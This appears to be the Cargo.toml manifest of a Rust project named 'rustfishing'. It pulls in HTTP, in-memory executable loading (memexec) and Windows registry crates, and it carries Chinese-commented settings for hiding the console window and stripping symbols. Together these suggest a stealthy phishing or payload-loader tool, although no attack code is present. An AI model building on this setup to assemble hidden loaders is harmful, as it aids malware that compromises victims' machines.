[package]
name = "rustfishing"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
reqwest = { version = "0.11", features = ["blocking", "json"] }
memexec = "0.2"
winreg = "0.50"
#隐藏黑边
#winapi = {version = "0.3", features = ["wincon", "winuser"]}
#cargo rustc --release -- -Clink-args="-Wl,--subsystem,windows"
[profile.release]
lto = true
opt-level = "z"               # 使用稍高一些的优化级别，最低是0，最高是3
overflow-checks = false
strip = "symbols"
codegen-units = 1
panic = 'abort'
code-model = "tiny"

